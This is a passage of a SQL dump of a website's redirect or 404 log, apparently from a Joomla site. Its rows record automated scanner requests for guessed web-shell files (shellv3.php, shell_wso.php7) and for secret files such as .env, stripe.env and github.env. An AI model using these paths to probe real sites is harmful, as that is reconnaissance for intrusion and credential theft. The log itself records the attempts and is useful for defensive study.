00:00:00',301),(48775,'http://mail.3s-technologies.com.tr/tr/20025.php',NULL,'','',2,0,'2025-11-04 16:56:45','0000-00-00 00:00:00',301),(48776,'http://mail.3s-technologies.com.tr/tr/wp-good.php',NULL,'','',69,0,'2025-11-04 16:56:50','0000-00-00 00:00:00',301),(48777,'http://mail.3s-technologies.com.tr/tr/ngek.php',NULL,'','',2,0,'2025-11-04 16:56:51','0000-00-00 00:00:00',301),(48778,'http://mail.3s-technologies.com.tr/tr/wp-admin/network/wp-conflg.php',NULL,'','',20,0,'2025-11-04 16:56:52','0000-00-00 00:00:00',301),(48779,'http://mail.3s-technologies.com.tr/tr/file51.php',NULL,'','',5,0,'2025-11-04 16:56:54','0000-00-00 00:00:00',301),(48780,'http://mail.3s-technologies.com.tr/tr/man.php',NULL,'','',13,0,'2025-11-04 16:56:55','0000-00-00 00:00:00',301),(48781,'http://mail.3s-technologies.com.tr/tr/unrubbish.php',NULL,'','',2,0,'2025-11-04 16:56:56','0000-00-00 00:00:00',301),(48782,'http://mail.3s-technologies.com.tr/tr/strubbly.php',NULL,'','',2,0,'2025-11-04 16:56:57','0000-00-00 00:00:00',301),(48783,'http://mail.3s-technologies.com.tr/tr/tiqdc.php',NULL,'','',2,0,'2025-11-04 16:56:58','0000-00-00 00:00:00',301),(48784,'http://mail.3s-technologies.com.tr/tr/hdwta.php',NULL,'','',2,0,'2025-11-04 16:56:59','0000-00-00 00:00:00',301),(48785,'http://mail.3s-technologies.com.tr/tr/hly.php',NULL,'','',3,0,'2025-11-04 17:42:17','0000-00-00 00:00:00',301),(48786,'http://mail.3s-technologies.com.tr/tr/d12.php',NULL,'','',16,0,'2025-11-04 17:42:18','0000-00-00 00:00:00',301),(48787,'http://mail.3s-technologies.com.tr/tr/135.php',NULL,'','',1,0,'2025-11-04 17:43:24','0000-00-00 00:00:00',301),(48788,'http://mail.3s-technologies.com.tr/tr/image.php',NULL,'','',8,0,'2025-11-04 17:43:29','0000-00-00 00:00:00',301),(48789,'http://mail.3s-technologies.com.tr/tr/0xx.php',NULL,'','',2,0,'2025-11-04 17:43:36','0000-00-00 00:00:00',301),(48790,'http://mail.3s-technologies.com.tr/tr/hq.php',NULL,'','',2,0,'2025-11-04 17:43:38','0000-00-00 00:00:00',301),(48791,'http://mail.3s-technologies.com.tr/tr/win.php',NULL,'','',1,0,'2025-11-04 17:43:39','0000-00-00 00:00:00',301),(48792,'http://mail.3s-technologies.com.tr/tr/fso.php',NULL,'','',2,0,'2025-11-04 17:43:41','0000-00-00 00:00:00',301),(48793,'http://mail.3s-technologies.com.tr/tr/sck.php',NULL,'','',2,0,'2025-11-04 17:43:47','0000-00-00 00:00:00',301),(48794,'http://mail.3s-technologies.com.tr/tr/x7x.php',NULL,'','',12,0,'2025-11-04 17:43:48','0000-00-00 00:00:00',301),(48795,'http://mail.3s-technologies.com.tr/tr/bless6.php',NULL,'','',1,0,'2025-11-04 17:43:52','0000-00-00 00:00:00',301),(48796,'http://mail.3s-technologies.com.tr/tr/bless10.php',NULL,'','',1,0,'2025-11-04 17:43:53','0000-00-00 00:00:00',301),(48797,'http://mail.3s-technologies.com.tr/tr/thoms.php',NULL,'','',5,0,'2025-11-04 17:43:56','0000-00-00 00:00:00',301),(48798,'http://mail.3s-technologies.com.tr/tr/xrp.php',NULL,'','',4,0,'2025-11-04 17:43:58','0000-00-00 00:00:00',301),(48799,'http://mail.3s-technologies.com.tr/tr/fesa.php',NULL,'','',2,0,'2025-11-04 17:44:02','0000-00-00 00:00:00',301),(48800,'http://mail.3s-technologies.com.tr/tr/class-.php',NULL,'','',2,0,'2025-11-04 17:44:03','0000-00-00 00:00:00',301),(48801,'http://mail.3s-technologies.com.tr/tr/lte7.php',NULL,'','',2,0,'2025-11-04 17:44:09','0000-00-00 00:00:00',301),(48802,'http://mail.3s-technologies.com.tr/tr/l10n.php',NULL,'','',2,0,'2025-11-04 17:44:11','0000-00-00 00:00:00',301),(48803,'http://mail.3s-technologies.com.tr/tr/zeu.php',NULL,'','',2,0,'2025-11-04 17:44:21','0000-00-00 00:00:00',301),(48804,'http://mail.3s-technologies.com.tr/tr/f2r4.php',NULL,'','',2,0,'2025-11-04 17:44:22','0000-00-00 00:00:00',301),(48805,'http://mail.3s-technologies.com.tr/tr/lopst.php',NULL,'','',3,0,'2025-11-04 17:44:23','0000-00-00 00:00:00',301),(48806,'http://mail.3s-technologies.com.tr/tr/gecko.php',NULL,'','',25,0,'2025-11-04 17:44:24','0000-00-00 00:00:00',301),(48807,'http://mail.3s-technologies.com.tr/tr/wsz.php',NULL,'','',2,0,'2025-11-04 17:44:29','0000-00-00 00:00:00',301),(48808,'http://mail.3s-technologies.com.tr/tr/ahy66.php',NULL,'','',2,0,'2025-11-04 17:44:30','0000-00-00 00:00:00',301),(48809,'http://mail.3s-technologies.com.tr/tr/zen.php',NULL,'','',1,0,'2025-11-04 17:44:33','0000-00-00 00:00:00',301),(48810,'http://3s-technologies.com.tr/tr/witmmm.php',NULL,'','',1,0,'2025-11-04 19:44:19','0000-00-00 00:00:00',301),(48811,'http://3s-technologies.com.tr/tr/18299.php',NULL,'','',5,0,'2025-11-04 19:44:20','0000-00-00 00:00:00',301),(48812,'http://3s-technologies.com.tr/tr/zxasd.php',NULL,'','',1,0,'2025-11-04 19:44:21','0000-00-00 00:00:00',301),(48813,'http://3s-technologies.com.tr/tr/wpfile.php',NULL,'','',1,0,'2025-11-04 19:44:26','0000-00-00 00:00:00',301),(48814,'http://3s-technologies.com.tr/tr/foyhd.php',NULL,'','',1,0,'2025-11-04 19:44:27','0000-00-00 00:00:00',301),(48815,'http://3s-technologies.com.tr/tr/f350.php',NULL,'','',1,0,'2025-11-04 19:44:28','0000-00-00 00:00:00',301),(48816,'http://3s-technologies.com.tr/tr/cmkhk.php',NULL,'','',1,0,'2025-11-04 19:44:32','0000-00-00 00:00:00',301),(48817,'http://3s-technologies.com.tr/tr/rtg.php',NULL,'','',2,0,'2025-11-04 19:44:33','0000-00-00 00:00:00',301),(48818,'http://3s-technologies.com.tr/tr/fluentform.php',NULL,'','',1,0,'2025-11-04 19:44:36','0000-00-00 00:00:00',301),(48819,'http://3s-technologies.com.tr/tr/agqpec.php',NULL,'','',1,0,'2025-11-04 19:44:37','0000-00-00 00:00:00',301),(48820,'http://3s-technologies.com.tr/tr/byuri.php',NULL,'','',1,0,'2025-11-04 19:44:38','0000-00-00 00:00:00',301),(48821,'http://3s-technologies.com.tr/tr/oiko6u.php',NULL,'','',1,0,'2025-11-04 19:44:40','0000-00-00 00:00:00',301),(48822,'http://3s-technologies.com.tr/tr/wp-admin/oiko6u.php',NULL,'','',1,0,'2025-11-04 19:44:41','0000-00-00 00:00:00',301),(48823,'http://3s-technologies.com.tr/tr/crew.php',NULL,'','',1,0,'2025-11-04 19:44:47','0000-00-00 00:00:00',301),(48824,'http://3s-technologies.com.tr/tr/sx_pms.php',NULL,'','',3,0,'2025-11-04 19:44:50','0000-00-00 00:00:00',301),(48825,'http://3s-technologies.com.tr/tr/btex.php',NULL,'','',1,0,'2025-11-04 19:44:51','0000-00-00 00:00:00',301),(48826,'http://3s-technologies.com.tr/tr/lptlo.php',NULL,'','',1,0,'2025-11-04 19:44:53','0000-00-00 00:00:00',301),(48827,'http://3s-technologies.com.tr/tr/misc.php',NULL,'','',4,0,'2025-11-04 19:44:54','0000-00-00 00:00:00',301),(48828,'http://3s-technologies.com.tr/tr/xlluw.php',NULL,'','',1,0,'2025-11-04 19:44:55','0000-00-00 00:00:00',301),(48829,'http://3s-technologies.com.tr/tr/auot.php',NULL,'','',1,0,'2025-11-04 19:44:58','0000-00-00 00:00:00',301),(48830,'http://3s-technologies.com.tr/tr/codex.php',NULL,'','',1,0,'2025-11-04 19:44:59','0000-00-00 00:00:00',301),(48831,'http://3s-technologies.com.tr/tr/ymq4nt.php',NULL,'','',1,0,'2025-11-04 19:45:00','0000-00-00 00:00:00',301),(48832,'http://3s-technologies.com.tr/tr/inzrw.php',NULL,'','',2,0,'2025-11-04 19:45:01','0000-00-00 00:00:00',301),(48833,'http://3s-technologies.com.tr/tr/ca.php',NULL,'','',5,0,'2025-11-04 19:45:02','0000-00-00 00:00:00',301),(48834,'http://3s-technologies.com.tr/tr/iuoqc.php',NULL,'','',1,0,'2025-11-04 19:45:04','0000-00-00 00:00:00',301),(48835,'http://3s-technologies.com.tr/tr/qufsq.php',NULL,'','',1,0,'2025-11-04 19:45:06','0000-00-00 00:00:00',301),(48836,'http://3s-technologies.com.tr/tr/155.php',NULL,'','',78,0,'2025-11-04 19:45:07','0000-00-00 00:00:00',301),(48837,'http://3s-technologies.com.tr/tr/oddtd.php',NULL,'','',1,0,'2025-11-04 19:45:15','0000-00-00 00:00:00',301),(48838,'http://3s-technologies.com.tr/tr/20025.php',NULL,'','',1,0,'2025-11-04 19:45:23','0000-00-00 00:00:00',301),(48839,'http://3s-technologies.com.tr/tr/ngek.php',NULL,'','',1,0,'2025-11-04 19:45:28','0000-00-00 00:00:00',301),(48840,'http://3s-technologies.com.tr/tr/file51.php',NULL,'','',12,0,'2025-11-04 19:45:32','0000-00-00 00:00:00',301),(48841,'http://3s-technologies.com.tr/tr/unrubbish.php',NULL,'','',1,0,'2025-11-04 19:45:34','0000-00-00 00:00:00',301),(48842,'http://3s-technologies.com.tr/tr/strubbly.php',NULL,'','',1,0,'2025-11-04 19:45:35','0000-00-00 00:00:00',301),(48843,'http://3s-technologies.com.tr/tr/tiqdc.php',NULL,'','',1,0,'2025-11-04 19:45:36','0000-00-00 00:00:00',301),(48844,'http://3s-technologies.com.tr/tr/hdwta.php',NULL,'','',1,0,'2025-11-04 19:45:37','0000-00-00 00:00:00',301),(48845,'http://mail.3s-technologies.com.tr/tr/asgtt.php',NULL,'','',1,0,'2025-11-04 22:08:53','0000-00-00 00:00:00',301),(48846,'http://mail.3s-technologies.com.tr/tr/wok.php',NULL,'','',1,0,'2025-11-04 22:08:55','0000-00-00 00:00:00',301),(48847,'http://mail.3s-technologies.com.tr/tr/alexus.php',NULL,'','',6,0,'2025-11-04 22:08:56','0000-00-00 00:00:00',301),(48848,'http://mail.3s-technologies.com.tr/tr/sadis.php',NULL,'','',2,0,'2025-11-04 22:08:57','0000-00-00 00:00:00',301),(48849,'http://mail.3s-technologies.com.tr/tr/admir.php',NULL,'','',9,0,'2025-11-04 22:08:58','0000-00-00 00:00:00',301),(48850,'http://mail.3s-technologies.com.tr/tr/file52.php',NULL,'','',9,0,'2025-11-04 22:08:59','0000-00-00 00:00:00',301),(48851,'http://mail.3s-technologies.com.tr/tr/sa.php7',NULL,'','',10,0,'2025-11-04 22:09:06','0000-00-00 00:00:00',301),(48852,'http://mail.3s-technologies.com.tr/tr/shellv3.php',NULL,'','',1,0,'2025-11-04 22:09:07','0000-00-00 00:00:00',301),(48853,'http://mail.3s-technologies.com.tr/tr/villain.php',NULL,'','',2,0,'2025-11-04 22:09:09','0000-00-00 00:00:00',301),(48854,'http://mail.3s-technologies.com.tr/tr/shell_wso.php7',NULL,'','',1,0,'2025-11-04 22:09:09','0000-00-00 00:00:00',301),(48855,'http://mail.3s-technologies.com.tr/tr/red.php',NULL,'','',3,0,'2025-11-04 22:09:10','0000-00-00 00:00:00',301),(48856,'http://mail.3s-technologies.com.tr/tr/jhdnz.php',NULL,'','',1,0,'2025-11-04 22:09:12','0000-00-00 00:00:00',301),(48857,'http://mail.3s-technologies.com.tr/tr/gh.php',NULL,'','',1,0,'2025-11-04 22:09:13','0000-00-00 00:00:00',301),(48858,'http://3s-technologies.com.tr/tr/wp-content/plugins/nomad/aec.php',NULL,'','',1,0,'2025-11-04 22:36:04','0000-00-00 00:00:00',301),(48859,'http://3s-technologies.com.tr/tr/aec.php',NULL,'','',3,0,'2025-11-04 22:36:05','0000-00-00 00:00:00',301),(48860,'http://3s-technologies.com.tr/tr/hydxrmgtbh.php',NULL,'','',2,0,'2025-11-04 22:36:08','0000-00-00 00:00:00',301),(48861,'http://3s-technologies.com.tr/tr/getid3s.php',NULL,'','',2,0,'2025-11-04 22:36:16','0000-00-00 00:00:00',301),(48862,'http://3s-technologies.com.tr/tr/fucku.php',NULL,'','',1,0,'2025-11-04 22:37:05','0000-00-00 00:00:00',301),(48863,'http://3s-technologies.com.tr/tr/wp-damin.php',NULL,'','',3,0,'2025-11-04 22:37:06','0000-00-00 00:00:00',301),(48864,'http://3s-technologies.com.tr/tr/asgtt.php',NULL,'','',5,0,'2025-11-05 01:34:59','0000-00-00 00:00:00',301),(48865,'http://3s-technologies.com.tr/tr/wok.php',NULL,'','',4,0,'2025-11-05 01:35:00','0000-00-00 00:00:00',301),(48866,'http://3s-technologies.com.tr/tr/sadis.php',NULL,'','',5,0,'2025-11-05 01:35:02','0000-00-00 00:00:00',301),(48867,'http://3s-technologies.com.tr/tr/admir.php',NULL,'','',14,0,'2025-11-05 01:35:03','0000-00-00 00:00:00',301),(48868,'http://3s-technologies.com.tr/tr/file52.php',NULL,'','',22,0,'2025-11-05 01:35:04','0000-00-00 00:00:00',301),(48869,'http://3s-technologies.com.tr/tr/av.php.php',NULL,'','',5,0,'2025-11-05 01:35:09','0000-00-00 00:00:00',301),(48870,'http://3s-technologies.com.tr/tr/villain.php',NULL,'','',2,0,'2025-11-05 01:35:13','0000-00-00 00:00:00',301),(48871,'http://3s-technologies.com.tr/tr/jhdnz.php',NULL,'','',1,0,'2025-11-05 01:35:17','0000-00-00 00:00:00',301),(48872,'http://3s-technologies.com.tr/tr/hly.php',NULL,'','',6,0,'2025-11-05 04:54:38','0000-00-00 00:00:00',301),(48873,'http://3s-technologies.com.tr/tr/d12.php',NULL,'','',30,0,'2025-11-05 04:54:39','0000-00-00 00:00:00',301),(48874,'http://3s-technologies.com.tr/tr/gool.php',NULL,'','',7,0,'2025-11-05 04:55:39','0000-00-00 00:00:00',301),(48875,'http://3s-technologies.com.tr/tr/135.php',NULL,'','',3,0,'2025-11-05 04:55:41','0000-00-00 00:00:00',301),(48876,'http://3s-technologies.com.tr/tr/0xx.php',NULL,'','',4,0,'2025-11-05 04:55:51','0000-00-00 00:00:00',301),(48877,'http://3s-technologies.com.tr/tr/hq.php',NULL,'','',4,0,'2025-11-05 04:55:53','0000-00-00 00:00:00',301),(48878,'http://3s-technologies.com.tr/tr/blox.php',NULL,'','',19,0,'2025-11-05 04:55:54','0000-00-00 00:00:00',301),(48879,'http://3s-technologies.com.tr/tr/fso.php',NULL,'','',4,0,'2025-11-05 04:55:56','0000-00-00 00:00:00',301),(48880,'http://3s-technologies.com.tr/tr/x7x.php',NULL,'','',36,0,'2025-11-05 04:56:02','0000-00-00 00:00:00',301),(48881,'http://3s-technologies.com.tr/tr/bless10.php',NULL,'','',3,0,'2025-11-05 04:56:07','0000-00-00 00:00:00',301),(48882,'http://3s-technologies.com.tr/tr/xsas.php',NULL,'','',40,0,'2025-11-05 04:56:10','0000-00-00 00:00:00',301),(48883,'http://3s-technologies.com.tr/tr/fesa.php',NULL,'','',4,0,'2025-11-05 04:56:15','0000-00-00 00:00:00',301),(48884,'http://3s-technologies.com.tr/tr/class-.php',NULL,'','',5,0,'2025-11-05 04:56:16','0000-00-00 00:00:00',301),(48885,'http://3s-technologies.com.tr/tr/lte7.php',NULL,'','',4,0,'2025-11-05 04:56:21','0000-00-00 00:00:00',301),(48886,'http://3s-technologies.com.tr/tr/l10n.php',NULL,'','',8,0,'2025-11-05 04:56:23','0000-00-00 00:00:00',301),(48887,'http://3s-technologies.com.tr/tr/tajj.php',NULL,'','',4,0,'2025-11-05 04:56:23','0000-00-00 00:00:00',301),(48888,'http://3s-technologies.com.tr/tr/fdd2.php',NULL,'','',4,0,'2025-11-05 04:56:24','0000-00-00 00:00:00',301),(48889,'http://3s-technologies.com.tr/tr/fh26.php',NULL,'','',5,0,'2025-11-05 04:56:29','0000-00-00 00:00:00',301),(48890,'http://3s-technologies.com.tr/tr/ixj.php',NULL,'','',4,0,'2025-11-05 04:56:29','0000-00-00 00:00:00',301),(48891,'http://3s-technologies.com.tr/tr/x23.php',NULL,'','',4,0,'2025-11-05 04:56:30','0000-00-00 00:00:00',301),(48892,'http://3s-technologies.com.tr/tr/zeu.php',NULL,'','',4,0,'2025-11-05 04:56:31','0000-00-00 00:00:00',301),(48893,'http://3s-technologies.com.tr/tr/f2r4.php',NULL,'','',4,0,'2025-11-05 04:56:32','0000-00-00 00:00:00',301),(48894,'http://3s-technologies.com.tr/tr/lopst.php',NULL,'','',9,0,'2025-11-05 04:56:33','0000-00-00 00:00:00',301),(48895,'http://3s-technologies.com.tr/tr/0xs.php',NULL,'','',4,0,'2025-11-05 04:56:35','0000-00-00 00:00:00',301),(48896,'http://3s-technologies.com.tr/tr/zeiss.php',NULL,'','',5,0,'2025-11-05 04:56:36','0000-00-00 00:00:00',301),(48897,'http://3s-technologies.com.tr/tr/x0x.php',NULL,'','',4,0,'2025-11-05 04:56:37','0000-00-00 00:00:00',301),(48898,'http://3s-technologies.com.tr/tr/adin.php',NULL,'','',4,0,'2025-11-05 04:56:38','0000-00-00 00:00:00',301),(48899,'https://3s-technologies.com.tr/tr/cron/.env',NULL,'','',9,0,'2025-11-05 11:27:27','0000-00-00 00:00:00',301),(48900,'https://3s-technologies.com.tr/tr/v2/.env',NULL,'','',7,0,'2025-11-05 11:27:27','0000-00-00 00:00:00',301),(48901,'https://3s-technologies.com.tr/tr/.env.old',NULL,'','',10,0,'2025-11-05 12:08:40','0000-00-00 00:00:00',301),(48902,'https://3s-technologies.com.tr/tr/.env.sample',NULL,'','',10,0,'2025-11-05 12:08:43','0000-00-00 00:00:00',301),(48903,'https://3s-technologies.com.tr/tr/.env.dist',NULL,'','',8,0,'2025-11-05 12:08:44','0000-00-00 00:00:00',301),(48904,'https://3s-technologies.com.tr/tr/.env.docker',NULL,'','',7,0,'2025-11-05 12:08:45','0000-00-00 00:00:00',301),(48905,'https://3s-technologies.com.tr/tr/.environment',NULL,'','',1,0,'2025-11-05 12:08:46','0000-00-00 00:00:00',301),(48906,'https://3s-technologies.com.tr/tr/.envrc',NULL,'','',1,0,'2025-11-05 12:08:47','0000-00-00 00:00:00',301),(48907,'https://3s-technologies.com.tr/tr/app.env',NULL,'','',1,0,'2025-11-05 12:08:48','0000-00-00 00:00:00',301),(48908,'https://3s-technologies.com.tr/tr/database.env',NULL,'','',1,0,'2025-11-05 12:08:51','0000-00-00 00:00:00',301),(48909,'https://3s-technologies.com.tr/tr/mailgun.env',NULL,'','',1,0,'2025-11-05 12:08:52','0000-00-00 00:00:00',301),(48910,'https://3s-technologies.com.tr/tr/stripe.env',NULL,'','',1,0,'2025-11-05 12:08:53','0000-00-00 00:00:00',301),(48911,'https://3s-technologies.com.tr/tr/github.env',NULL,'','',1,0,'2025-11-05 12:08:54','0000-00-00 00:00:00',301),(48912,'https://3s-technologies.com.tr/en/postnews.php',NULL,'','',1,0,'2025-11-05 17:35:02','0000-00-00 00:00:00',301),(48913,'https://3s-technologies.com.tr/tr/.netlify/images?url=',NULL,'https://3s-technologies.com.tr/.netlify/images?url=','',1,0,'2025-11-05 17:48:26','0000-00-00 00:00:00',301),(48914,'https://3s-technologies.com.tr/en/link.php',NULL,'','',1,0,'2025-11-05 18:49:36','0000-00-00 00:00:00',301),(48915,'https://3s-technologies.com.tr/tr//plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php',NULL,'','',1,0,'2025-11-06 05:22:45','0000-00-00 00:00:00',301),(48916,'http://3s-technologies.com.tr/en/koibdyqf.php?fox=d3wl7',NULL,'www.google.com','',1,0,'2025-11-06 06:35:35','0000-00-00 00:00:00',301),(48917,'https://3s-technologies.com.tr/en/aombmtsd.php?fox=d3wl7',NULL,'www.google.com','',1,0,'2025-11-06 06:35:36','0000-00-00 00:00:00',301),(48918,'http://3s-technologies.com.tr/tr/static/wsd.php',NULL,'','',1,0,'2025-11-06 13:18:10','0000-00-00 00:00:00',301),(48919,'http://3s-technologies.com.tr/tr/wp-content/wsd.php',NULL,'','',1,0,'2025-11-06 13:18:11','0000-00-00 00:00:00',301),(48920,'http://mail.3s-technologies.com.tr/tr/webdb.php',NULL,'','',3,0,'2025-11-07 02:02:38','0000-00-00 00:00:00',301),(48921,'http://www.3s-technologies.com.tr/tr/webdb.php',NULL,'','',1,0,'2025-11-07 04:05:59','0000-00-00 00:00:00',301),(48922,'http://www.3s-technologies.com.tr/tr/witmmm.php',NULL,'','',1,0,'2025-11-07 04:06:00','0000-00-00 00:00:00',301),(48923,'http://www.3s-technologies.com.tr/tr/18299.php',NULL,'','',1,0,'2025-11-07 04:06:00','0000-00-00 00:00:00',301),(48924,'http://www.3s-technologies.com.tr/tr/zxasd.php',NULL,'','',1,0,'2025-11-07 04:06:01','0000-00-00 00:00:00',301),(48925,'http://www.3s-technologies.com.tr/tr/nxx.php',NULL,'','',1,0,'2025-11-07 04:06:01','0000-00-00 00:00:00',301),(48926,'http://www.3s-technologies.com.tr/tr/shlo.php',NULL,'','',4,0,'2025-11-07 04:06:02','0000-00-00 00:00:00',301),(48927,'http://www.3s-technologies.com.tr/tr/sql.php',NULL,'','',5,0,'2025-11-07 04:06:02','0000-00-00 00:00:00',301),(48928,'http://www.3s-technologies.com.tr/tr/wpfile.php',NULL,'','',1,0,'2025-11-07 04:06:03','0000-00-00 00:00:00',301),(48929,'http://www.3s-technologies.com.tr/tr/foyhd.php',NULL,'','',1,0,'2025-11-07 04:06:04','0000-00-00 00:00:00',301),(48930,'http://www.3s-technologies.com.tr/tr/f350.php',NULL,'','',1,0,'2025-11-07 04:06:04','0000-00-00 00:00:00',301),(48931,'http://www.3s-technologies.com.tr/tr/cmkhk.php',NULL,'','',1,0,'2025-11-07 04:06:06','0000-00-00 00:00:00',301),(48932,'http://www.3s-technologies.com.tr/tr/rtg.php',NULL,'','',2,0,'2025-11-07 04:06:07','0000-00-00 00:00:00',301),(48933,'http://www.3s-technologies.com.tr/tr/tools.php',NULL,'','',1,0,'2025-11-07 04:06:08','0000-00-00 00:00:00',301),(48934,'http://www.3s-technologies.com.tr/tr/term.php',NULL,'','',11,0,'2025-11-07 04:06:08','0000-00-00 00:00:00',301),(48935,'http://www.3s-technologies.com.tr/tr/fluentform.php',NULL,'','',1,0,'2025-11-07 04:06:09','0000-00-00 00:00:00',301),(48936,'http://www.3s-technologies.com.tr/tr/agqpec.php',NULL,'','',1,0,'2025-11-07 04:06:09','0000-00-00 00:00:00',301),(48937,'http://www.3s-technologies.com.tr/tr/byuri.php',NULL,'','',1,0,'2025-11-07 04:06:10','0000-00-00 00:00:00',301),(48938,'http://www.3s-technologies.com.tr/tr/oiko6u.php',NULL,'','',1,0,'2025-11-07 04:06:11','0000-00-00 00:00:00',301),(48939,'http://www.3s-technologies.com.tr/tr/wp-admin/oiko6u.php',NULL,'','',1,0,'2025-11-07 04:06:11','0000-00-00 00:00:00',301),(48940,'http://www.3s-technologies.com.tr/tr/crew.php',NULL,'','',1,0,'2025-11-07 04:06:15','0000-00-00 00:00:00',301),(48941,'http://www.3s-technologies.com.tr/tr/gm.php',NULL,'','',4,0,'2025-11-07 04:06:15','0000-00-00 00:00:00',301),(48942,'http://www.3s-technologies.com.tr/tr/sx_pms.php',NULL,'','',1,0,'2025-11-07 04:06:16','0000-00-00 00:00:00',301),(48943,'http://www.3s-technologies.com.tr/tr/btex.php',NULL,'','',1,0,'2025-11-07 04:06:17','0000-00-00 00:00:00',301),(48944,'http://www.3s-technologies.com.tr/tr/ms.php',NULL,'','',12,0,'2025-11-07 04:06:17','0000-00-00 00:00:00',301),(48945,'http://www.3s-technologies.com.tr/tr/lptlo.php',NULL,'','',1,0,'2025-11-07 04:06:18','0000-00-00 00:00:00',301),(48946,'http://www.3s-technologies.com.tr/tr/misc.php',NULL,'','',1,0,'2025-11-07 04:06:18','0000-00-00 00:00:00',301),(48947,'http://www.3s-technologies.com.tr/tr/xlluw.php',NULL,'','',1,0,'2025-11-07 04:06:19','0000-00-00 00:00:00',301),(48948,'http://www.3s-technologies.com.tr/tr/qa.php',NULL,'','',1,0,'2025-11-07 04:06:20','0000-00-00 00:00:00',301),(48949,'http://www.3s-technologies.com.tr/tr/auot.php',NULL,'','',1,0,'2025-11-07 04:06:20','0000-00-00 00:00:00',301),(48950,'http://www.3s-technologies.com.tr/tr/codex.php',NULL,'','',1,0,'2025-11-07 04:06:21','0000-00-00 00:00:00',301),(48951,'http://www.3s-technologies.com.tr/tr/ymq4nt.php',NULL,'','',1,0,'2025-11-07 04:06:22','0000-00-00 00:00:00',301),(48952,'http://www.3s-technologies.com.tr/tr/inzrw.php',NULL,'','',2,0,'2025-11-07 04:06:23','0000-00-00 00:00:00',301),(48953,'http://www.3s-technologies.com.tr/tr/ca.php',NULL,'','',2,0,'2025-11-07 04:06:23','0000-00-00 00:00:00',301),(48954,'http://www.3s-technologies.com.tr/tr/lx.php',NULL,'','',1,0,'2025-11-07 04:06:24','0000-00-00 00:00:00',301),(48955,'http://www.3s-technologies.com.tr/tr/iuoqc.php',NULL,'','',1,0,'2025-11-07 04:06:24','0000-00-00 00:00:00',301),(48956,'http://www.3s-technologies.com.tr/tr/qufsq.php',NULL,'','',1,0,'2025-11-07 04:06:26','0000-00-00 00:00:00',301),(48957,'http://www.3s-technologies.com.tr/tr/155.php',NULL,'','',8,0,'2025-11-07 04:06:26','0000-00-00 00:00:00',301),(48958,'http://www.3s-technologies.com.tr/tr/sosu.php',NULL,'','',1,0,'2025-11-07 04:06:27','0000-00-00 00:00:00',301),(48959,'http://www.3s-technologies.com.tr/tr/zero.php',NULL,'','',1,0,'2025-11-07 04:06:27','0000-00-00 00:00:00',301),(48960,'http://www.3s-technologies.com.tr/tr/667.php',NULL,'','',1,0,'2025-11-07 04:06:28','0000-00-00 00:00:00',301),(48961,'http://www.3s-technologies.com.tr/tr/c4.php',NULL,'','',3,0,'2025-11-07 04:06:28','0000-00-00 00:00:00',301),(48962,'http://www.3s-technologies.com.tr/tr/700.php',NULL,'','',1,0,'2025-11-07 04:06:29','0000-00-00 00:00:00',301);
INSERT INTO `fz6t4_redirect_links` VALUES (48963,'http://www.3s-technologies.com.tr/tr/oddtd.php',NULL,'','',1,0,'2025-11-07 04:06:30','0000-00-00 00:00:00',301),(48964,'http://www.3s-technologies.com.tr/tr/sx.php',NULL,'','',6,0,'2025-11-07 04:06:33','0000-00-00 00:00:00',301),(48965,'http://www.3s-technologies.com.tr/tr/20025.php',NULL,'','',1,0,'2025-11-07 04:06:34','0000-00-00 00:00:00',301),(48966,'http://www.3s-technologies.com.tr/tr/wp-good.php',NULL,'','',20,0,'2025-11-07 04:06:36','0000-00-00 00:00:00',301),(48967,'http://www.3s-technologies.com.tr/tr/ngek.php',NULL,'','',1,0,'2025-11-07 04:06:37','0000-00-00 00:00:00',301),(48968,'http://www.3s-technologies.com.tr/tr/wp-admin/network/wp-conflg.php',NULL,'','',5,0,'2025-11-07 04:06:37','0000-00-00 00:00:00',301),(48969,'http://www.3s-technologies.com.tr/tr/file51.php',NULL,'','',1,0,'2025-11-07 04:06:39','0000-00-00 00:00:00',301),(48970,'http://www.3s-technologies.com.tr/tr/man.php',NULL,'','',1,0,'2025-11-07 04:06:39','0000-00-00 00:00:00',301),(48971,'http://www.3s-technologies.com.tr/tr/unrubbish.php',NULL,'','',1,0,'2025-11-07 04:06:40','0000-00-00 00:00:00',301),(48972,'http://www.3s-technologies.com.tr/tr/strubbly.php',NULL,'','',1,0,'2025-11-07 04:06:40','0000-00-00 00:00:00',301),(48973,'http://www.3s-technologies.com.tr/tr/tiqdc.php',NULL,'','',1,0,'2025-11-07 04:06:41','0000-00-00 00:00:00',301),(48974,'http://www.3s-technologies.com.tr/tr/hdwta.php',NULL,'','',1,0,'2025-11-07 04:06:41','0000-00-00 00:00:00',301),(48975,'http://3s-technologies.com.tr/tr/aiman.php',NULL,'','',1,0,'2025-11-07 22:16:38','0000-00-00 00:00:00',301),(48976,'http://3s-technologies.com.tr/tr/sf9.php',NULL,'','',3,0,'2025-11-08 13:04:31','0000-00-00 00:00:00',301),(48977,'http://3s-technologies.com.tr/tr/sf.php',NULL,'','',70,0,'2025-11-08 13:04:32','0000-00-00 00:00:00',301),(48978,'http://mail.3s-technologies.com.tr/tr/block-bindings.php',NULL,'','',1,0,'2025-11-08 16:13:45','0000-00-00 00:00:00',301),(48979,'http://mail.3s-technologies.com.tr/tr/ colors.php',NULL,'','',1,0,'2025-11-08 16:13:46','0000-00-00 00:00:00',301),(48980,'http://mail.3s-technologies.com.tr/tr/layout.php',NULL,'','',17,0,'2025-11-08 16:13:47','0000-00-00 00:00:00',301),(48981,'http://mail.3s-technologies.com.tr/tr/end.php',NULL,'','',4,0,'2025-11-08 16:13:48','0000-00-00 00:00:00',301),(48982,'http://mail.3s-technologies.com.tr/tr/credits.php',NULL,'','',4,0,'2025-11-08 16:13:51','0000-00-00 00:00:00',301),(48983,'http://mail.3s-technologies.com.tr/tr/pwnd.php',NULL,'','',1,0,'2025-11-08 16:13:52','0000-00-00 00:00:00',301),(48984,'http://mail.3s-technologies.com.tr/tr/jcrop.php',NULL,'','',12,0,'2025-11-08 16:13:53','0000-00-00 00:00:00',301),(48985,'http://mail.3s-technologies.com.tr/tr/pt.php',NULL,'','',1,0,'2025-11-08 16:13:57','0000-00-00 00:00:00',301),(48986,'http://mail.3s-technologies.com.tr/tr/about.php7',NULL,'','',4,0,'2025-11-08 16:13:58','0000-00-00 00:00:00',301),(48987,'http://mail.3s-technologies.com.tr/tr/abruzi.php',NULL,'','',1,0,'2025-11-08 16:13:59','0000-00-00 00:00:00',301),(48988,'http://mail.3s-technologies.com.tr/tr/wp-is.php',NULL,'','',15,0,'2025-11-08 16:14:02','0000-00-00 